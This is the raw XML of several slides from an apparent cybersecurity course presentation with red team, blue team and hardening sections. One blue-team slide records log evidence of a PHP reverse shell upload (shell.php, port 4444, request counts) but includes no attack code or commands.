            <a:off x="3761300" y="835137"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA7212D1-9251-4F86-8023-193FF75B7CA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="4253" t="66789" r="1477" b="17493"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="311518" y="1485468"/>
            <a:ext cx="6313167" cy="992482"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
              <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D62FC89-1228-4332-B72A-FACF20D98A27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311518" y="1702342"/>
            <a:ext cx="6057985" cy="256054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2200807F-BCE4-4BB4-B6A5-74108CDD1897}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect l="4364" t="32272" r="6981" b="44850"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="367350" y="2477950"/>
            <a:ext cx="6257335" cy="1127112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
              <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
            </a:ext>
          </a:ex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188"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1189" name="Google Shape;1189;p68"/>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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Analysis: Identifying the PHP Reverse Shell</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1190" name="Google Shape;1190;p68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="4114800" cy="749081"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="91425" rIns="457200" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>Answer the following questions in bullet points under the screenshot if space allows. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>Otherwise, add the answers to speaker notes. </a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1191" name="Google Shape;1191;p68"/>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192" name="Google Shape;1192;p68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1467800"/>
            <a:ext cx="8409300" cy="2384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Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1193" name="Google Shape;1193;p68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3663050" y="741300"/>
            <a:ext cx="5791200" cy="971700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="91425" rIns="457200" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>How many requests were made to this directory? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" dirty="0"/>
              <a:t>10</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>Which files were requested? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" dirty="0"/>
              <a:t>hell.php</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1194" name="Google Shape;1194;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3761300" y="835137"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC356D79-C879-424B-B585-659168F0242E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="4008" t="68284" r="4704" b="27298"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="266864" y="3391019"/>
            <a:ext cx="4742120" cy="448247"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
              <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D7210BA-001E-4101-830B-8782280AC577}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="4008" t="71677" r="4704" b="17493"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="292921" y="3001391"/>
            <a:ext cx="4518836" cy="628720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
              <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EF89951-EC55-400D-89D6-290EE401C256}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect l="4327" t="57867" r="6410" b="7640"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1754374"/>
            <a:ext cx="8394897" cy="1194806"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
              <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21BC5FE3-63CA-4FE1-B893-FEE915E4A207}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="292921" y="3915198"/>
            <a:ext cx="8394897" cy="784384"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B5A0FA8-057C-4FA0-B896-D90A88DE805E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="167557" y="1531098"/>
            <a:ext cx="2823209" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Evidence of listening on port 4444</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60A8E0FD-DF6F-498E-A6BC-0E0CE33481AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="167557" y="2843670"/>
            <a:ext cx="4501816" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>System logs showing “put” and “get” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1"/>
              <a:t>http.request.method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF9FAD4C-46E3-434D-927E-78B1CFF3B80F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="167556" y="3773247"/>
            <a:ext cx="3495493" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>Dashboard panel showing count of requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1679776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95DB1A9-8958-4861-B60B-FC75606A59ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Table of Contents</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Subtitle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBC6E1B1-B81A-46BE-8C05-0F987CB33E43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This document contains the following sections:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Subtitle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C81717E-E4E5-4DE8-8C85-685C4F31C4FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Subtitle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2733B70-DCFC-474B-AE94-9BB5821A4A3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Executive Summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Subtitle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DDB2F9F-1FBA-4C5E-9093-07FC96AC6D40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Network Topology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Subtitle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0603AAD3-C8B1-4D42-8363-6FC1F4DAEEAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Red Team</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>: Security Assessment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Subtitle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82C1F7D4-9628-495A-9055-1BB8E04DFF0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Blue Team</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>: Log Analysis and Attack Characterization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Subtitle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7A1A28A-9AC9-4C6C-ABC8-29BC09E98AB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Hardening</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>: Proposed Alarms and Mitigation Strategies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29314986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pic>
        <p:nvPicPr>
          <p:cNvPr id="1199" name="Google Shape;1199;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="274322" y="289900"/>
            <a:ext cx="8595295" cy="4593614"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1200" name="Google Shape;1200;p69"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="1631275"/>
            <a:ext cx="8595300" cy="202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t>Blue Team</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
